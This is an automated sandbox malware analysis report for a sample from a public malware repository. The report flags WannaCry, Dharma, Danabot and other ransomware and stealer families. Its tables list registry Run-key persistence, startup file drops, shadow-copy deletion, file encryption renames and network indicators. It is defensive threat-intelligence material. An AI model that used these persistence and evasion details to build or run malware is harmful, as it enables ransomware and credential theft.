Malware Analysis Report

2024-11-13 18:02

Sample ID 241109-vzld3a1phm
Target https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Virus/WinNuke.98.exe
Tags
chimera danabot dharma troldesh wannacry banker botnet credential_access defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan upx worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Virus/WinNuke.98.exe was found to be: Known bad.

Malicious Activity Summary

chimera danabot dharma troldesh wannacry banker botnet credential_access defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan upx worm

Danabot

Danabot family

Wannacry

Dharma family

Dharma

Wannacry family

Chimera

Troldesh, Shade, Encoder.858

Danabot x86 payload

Troldesh family

Chimera family

Renames multiple (503) files with added filename extension

Deletes shadow copies

Downloads MZ/PE file

Blocklisted process makes network request

Disables Task Manager via registry modification

Reads user/profile data of web browsers

Drops startup file

Modifies file permissions

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Credentials from Password Stores: Windows Credential Manager

Drops desktop.ini file(s)

Adds Run key to start application

Checks installed software on the system

Enumerates connected drives

Modifies WinLogon

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

UPX packed file

Sets desktop wallpaper using registry

Drops file in System32 directory

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Enumerates physical storage devices

Kills process with taskkill

Suspicious use of SetWindowsHookEx

NTFS ADS

Suspicious behavior: GetForegroundWindowSpam

Interacts with shadow copies

Enumerates system info in registry

Views/modifies file attributes

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Modifies registry key

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Modifies registry class

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Checks processor information in registry

Uses Volume Shadow Copy WMI provider

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 17:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 17:25

Reported

2024-11-09 17:39

Platform

win10ltsc2021-20241023-en

Max time kernel

777s

Max time network

800s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Virus/WinNuke.98.exe

Signatures

Chimera

ransomware chimera
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files (x86)\Butterfly on Desktop\YOUR_FILES_ARE_ENCRYPTED.HTML C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Program Files (x86)\Briano\UWPHook\YOUR_FILES_ARE_ENCRYPTED.HTML C:\Windows\SysWOW64\rundll32.exe N/A
N/A bot.whatismyipaddress.com N/A N/A

Chimera family

chimera

Danabot

trojan banker danabot

Danabot family

danabot

Danabot x86 payload

botnet
Description Indicator Process Target
N/A N/A N/A N/A

Dharma

ransomware dharma

Dharma family

dharma

Troldesh family

troldesh

Troldesh, Shade, Encoder.858

ransomware trojan troldesh

Wannacry

ransomware worm wannacry

Wannacry family

wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (503) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CoronaVirus.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD4C92.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD469F.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD1FE2.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD2B6A.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD33AF.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD33B6.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD2A33.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\info.hta C:\Windows\system32\taskmgr.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD1FE9.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD2B81.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD8670.tmp C:\Users\Admin\Downloads\WannaCry.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD8677.tmp C:\Users\Admin\Downloads\WannaCry.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD4C99.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD3D34.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD2A3A.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD510A.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD5130.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD46A6.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD3D0D.tmp C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\DanaBot.exe N/A
N/A N/A C:\Users\Admin\Downloads\WannaCry.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
N/A N/A C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\AgentTesla.exe N/A
N/A N/A C:\Users\Admin\Downloads\butterflyondesktop.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe" C:\Users\Admin\Downloads\CoronaVirus.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\"" C:\Users\Admin\Downloads\CoronaVirus.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\"" C:\Users\Admin\Downloads\CoronaVirus.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop C:\Users\Admin\AppData\Local\Temp\is-A3D3N.tmp\butterflyondesktop.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r" C:\Users\Admin\Downloads\WannaCry.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\pdyantnatxy168 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\"" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" C:\Users\Admin\Downloads\NoMoreRansom.exe N/A

Checks installed software on the system

discovery

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-87863914-780023816-688321450-1000\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-87863914-780023816-688321450-1000\desktop.ini C:\Users\Admin\Downloads\CoronaVirus.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\Downloads\000.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\Downloads\000.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A bot.whatismyipaddress.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" C:\Users\Admin\Downloads\000.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\CoronaVirus.exe C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Windows\System32\Info.hta C:\Users\Admin\Downloads\CoronaVirus.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp" C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Downloads\@[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\Desktop\Wallpaper C:\Users\Admin\Downloads\000.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\123.0.6312.123.manifest C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javapackager.exe.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-ul-oob.xrm-ms.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libcrystalhd_plugin.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu.xml C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Java\jdk-1.8\legal\jdk\unicode.md.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Xml.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
